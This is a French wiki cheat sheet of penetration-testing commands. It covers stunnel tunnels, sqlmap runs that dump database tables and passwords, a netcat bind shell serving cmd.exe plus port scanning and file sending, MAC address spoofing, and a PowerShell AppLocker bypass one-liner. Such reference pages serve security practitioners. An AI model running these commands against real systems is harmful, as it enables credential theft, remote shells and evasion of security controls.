Outils divers

De UnixWiki
Aller à la navigation Aller à la recherche

Stunnel

Créer un tunnel SSL

 #stunnel -c -d 127.0.0.1:9999 -r foo:9998

Sur l'hôte disant:

 #stunnel -d 9998 -r 127.0.0.1:9999

SQLMap

Récupérer le nom de la base (-v 5 pour plus de verbosité)

 # sqlmap -u 'http://172.16.188.134/test.php?id=1' --dbs -v 5

Afficher les tables

 # sqlmap -u 'http://172.16.188.134/test.php?id=1' -v 5 -D credo --tables

Afficher les colonnes de la table members

 # sqlmap -u 'http://172.16.188.134/test.php?id=1' -D credo -T members --columns

Dump de la base

 # sqlmap -u 'http://172.16.188.134/test.php?id=1' -D credo -T members --dump
 # python sqlmap.py -u http://www.test.com/pages.php?num=1 -f -b --current-user --current-db --users --passwords -dbs -v 0
 # ./sqlmap.py -u http://www.test.com/pages.php/index.php --string="This user exists" --technique=B --auth-type=Basic --auth-cred=toto:hash --data "username=georges" -D DatabaseName -T TableName -C username,password --dump --level=5 --risk=3

Options utilisées

-u : adresse de la cible -f : prise d’empreinte du SGBD -b : bannière du SGBD –current-user : session utilisateur –current-db : Base –users : énumération des utilisateurs dans la Base –passwords : énumération des mots de passe dans la Base –dbs : listing des différentes bases disponibles -v : verbosité (0, warning, etc.)

Netcat/Cryptcat

  • Cryptcat est un clone de Netcat cryptant toutes ces communications

Scanner des ports

 nc -v -w 2-z foo 1-1224

Se connecter sur un port

 nc -v -n 192.168.1.1 21

Mettre netcat en écoute (serveur)

 nc -L p 10001 -d -e cmd.exe (-L en écoute, -p port, -d détacher le process -e commande à lancer à la connection)

Envoyer un fichier

 nc 192.168.1.1 1234 < file.txt

MacChanger

Changer la mac adress de la carte réseau

 #macchanger -m 12:34:56:78:90:12 eth0

Identification de fichiers

La commande file analyse l'entête du fichier et révélera sa nature
strings permet de trouver des chaînes ASCII
xdd permet de retrouver des mots et leur endroits.
hachoir-subfile examine tous le fichier à la recherche d'entête connus. Pratique en cas de concaténation de fichiers.
Si c'est un fichier binaire, le déboguer avec gdb.
Le désassembler avec objdump ou IDA.

Applocker Bypass

Powershell

 [System.Reflection.Assembly]::LoadFrom("C:\BinaireDotNet.exe").entrypoint.invoke($null, $null)